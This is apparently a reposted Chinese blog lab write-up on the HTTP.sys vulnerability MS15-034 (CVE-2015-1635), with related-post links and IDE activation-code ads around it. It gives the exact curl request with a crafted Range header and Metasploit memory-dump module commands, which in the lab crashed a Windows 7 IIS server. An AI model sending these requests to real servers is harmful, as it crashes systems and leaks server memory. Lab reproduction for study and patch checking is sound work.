HTTP.SYS远程代码执行漏洞(MS15-034)

HTTP.SYS远程代码执行漏洞(MS15-034)目录简介影响范围危害漏洞复现win2008r2换成win7利用msf简介漏洞编号:CVE-2015-1635(MS15-034)远程执行代码漏洞存在于HTTP协议堆栈(HTTP.sys)中,当HTTP.sys未正确分析经特殊设计的HTTP请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。影响范围任何安装了微软IIS6.0以上的WinServer2008R2、Win…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

目录

 

简介

影响范围

危害

漏洞复现

win2008 r2

换成win7

利用msf


简介

漏洞编号:CVE-2015-1635(MS15-034 )

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,
当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 
成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

影响范围

任何安装了微软IIS 6.0以上的
    Win Server 2008 R2、 
    Win Server 2012、
    Win Server 2012 R2、
    Win 7、
    Win 8、
    Win 8.1

危害

(1)远程读取IIS服务器的内存数据,
(2)使服务器系统蓝屏崩溃。

漏洞复现

win2008 r2

环境:win2008 r2 ,iis7.5

(一)利用curl

curl -v IP -H “Host:irrelevant” -H “Range: bytes=0-18446744073709551615”

用的时候仅仅修改IP就行;这个IP可以是:纯IP、IP加端口号、域名。

如果服务器存在HTTP.SYS远程代码执行漏洞,那么响应状态应该有:

 HTTP/1.1 416 Requested Range Not Satisfiable

如果服务器打上了补丁,那么响应状态应该是:

HTTP Error 400. The request has an invalid header name.

HTTP.SYS远程代码执行漏洞(MS15-034)  进行发包,这里并没有成功,不存在这个漏洞

HTTP.SYS远程代码执行漏洞(MS15-034)

 

换成win7

win7安装iis服务 https://jingyan.baidu.com/article/219f4bf723bcb2de442d38ed.html

web界面如下

HTTP.SYS远程代码执行漏洞(MS15-034)

发送数据包,漏洞存在

HTTP.SYS远程代码执行漏洞(MS15-034)

利用msf

search ms 15-034
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts xxx
run

但是这里的状态码并不是  HTTP/1.1 416 Requested Range Not Satisfiable,但还是成功了

服务器瞬间蓝屏然后重启了

HTTP.SYS远程代码执行漏洞(MS15-034)

                                                                                                                                                                                                —— 心,若没有栖息的地方,到哪里都是流浪

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/161405.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • Python 一篇学会多线程「建议收藏」

    Python 一篇学会多线程「建议收藏」多线程一篇就懂了

  • 关于事务的隔离级别和处理机制的理解

    关于事务的隔离级别和处理机制的理解

    2021年11月25日
  • linux暴力破解工具

    对于Linux操作系统来说,一般通过VNC、Teamviewer和SSH等工具来进行远程管理,SSH是SecureShell的缩写,由IETF的网络小组(NetworkWorkingGroup)所制定;SSH 为建立在应用层基础上的安全协议。 SSH是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用SSH协议可以有效防止远程管理过程中的信…

  • 分布式微服务架构的优缺点_单体架构和微服务架构

    分布式微服务架构的优缺点_单体架构和微服务架构单体架构、分布式架构、微服务优缺点单体架构特点?简单方便,高度耦合,扩展性差,适合小型项目。eg:学生管理系统。分布式架构特点?松耦合,扩展性好,但架构复杂,难度大。适合大型互联网项目,eg:京东、淘宝微服务:一种良好的分布式架构方案*优点:拆分粒度更小、服务更独立、耦合度更低*缺点:架构非常复杂,运维、监控、部署难度提高…

  • flowable 集成mongodb

    flowable 集成mongodb学无止境,活到老学到老,每天都问自己进步了吗?1.背景由于公司每天有至少1500个表单发起,处理待办任务至少7000个,累计历史任务数据已经达到200多w条,时间一长,通过数据库查询已办的任何和我发起的流程巨慢所以我们考虑到这些数据能不能放入ES或者是mongodb中流程中心1.0版本集成的是ES,速度确实非常快,提升查询性能近万倍,但是由于ES是一个全文检索的系统,对我们这些业务数据来说…

  • java -jar 启动程序/设置classpath

    java -jar 启动程序/设置classpath前言在java-jar命令执行java程序时,制定classpath解决方案Java命令行提供了如何扩展bootStrap级别class的简单方法.-Xbootclasspath:完全取代基本核心的Javaclass搜索路径.不常用,否则要重新写所有Java核心class-Xbootclasspath/a:后缀。将classpath添加在核心cl…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号